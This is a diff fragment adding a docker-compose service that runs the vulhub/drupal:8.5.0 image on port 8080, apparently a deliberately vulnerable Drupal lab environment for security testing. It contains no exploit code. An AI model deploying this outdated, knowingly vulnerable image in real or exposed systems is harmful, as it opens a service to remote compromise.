+ web:
+   image: vulhub/drupal:8.5.0
+   ports:
+    - "8080:80"